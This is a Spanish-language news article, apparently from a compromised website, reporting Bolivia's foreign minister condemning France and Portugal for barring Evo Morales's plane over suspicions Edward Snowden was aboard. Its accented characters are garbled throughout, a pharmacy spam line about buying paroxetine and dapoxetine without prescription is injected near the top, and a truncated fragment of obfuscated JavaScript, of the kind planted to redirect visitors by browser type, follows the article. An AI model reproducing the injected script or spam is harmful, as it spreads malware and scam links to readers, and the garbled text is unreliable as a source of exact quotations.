«Se ha puesto en riesgo la vida del presidente Morales. Es una actitud altamente discriminatoria»

evo avion

paroxetine online, dapoxetine without prescription.

AsA? se pronunciA? el canciller de Bolivia, David Choquehuanca, sobre la sorpresiva decisiA?n de las autoridades de Francia y Portugal, que este martes prohibieron que el aviA?n presidencial de Evo Morales sobrevuele por sus territorios.

Esta prohibiciA?n obligA? al aviA?n del presidente boliviano a aterrizar de emergencia en Austria, lo cual ha causado mucho malestar en el gobierno boliviano.

El canciller calificA? y denunciA? el acto como «discriminatorio» y manifestA? que los gobiernos de dichos paA?ses europeos pusieron «en riesgo la vida de un presidente. Tal vez querA?an amedrentarnos. Consideramos que es una actitud altamente discriminatoria hacia nuestro presidente», indicA? indignado David Choquehuanca.

TrascendiA? que la prohibiciA?n de Francia y Portugal se debiA? a que existA?an sospechas de que en el aviA?n presidencial de Evo Morales estaba viajando Edward Snowden, exanalista de la Agencia Central de Inteligencia (CIA).

Snowden destapA? una enorme red de espionaje de los Estados Unidos y actualmente se encuentra en el A?rea internacional de un aeropuerto de MoscA?, en Rusia, a la espera de viajar a otro paA?s para refugiarse como asilado polA?tico.

El canciller de Bolivia negA? la presencia de Snowden en el aviA?n presidencial de Evo Morales. A?a??No hay posibilidad de que haya un pasajero extra a los que fueron seA?alados en el viaje. Alguien ha hecho circular esta soberana mentira para perjudicar a Boliviaa??, asegurA? Choquehuanca.

Por su parte, el vicepresidente boliviano, A?lvaro GarcA?a Linera, denunciA? que el presidente Evo Morales «ha sido secuestrado por el imperialismo y estA? retenido en Europa».

El presidente Morales regresaba este martes de Rusia luego de participar en una Cumbre de PaA?ses Exportadores de Gas.

El gobierno boliviano anunciA? que pedirA? explicaciones a los gobiernos de Francia y Portugal sobre el hecho. «Nos deben una explicaciA?n, no puede quedar esto en una interrogantea??, aseverA? el canciller de Bolivia. (PULSAR)

_0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

2 + 1 =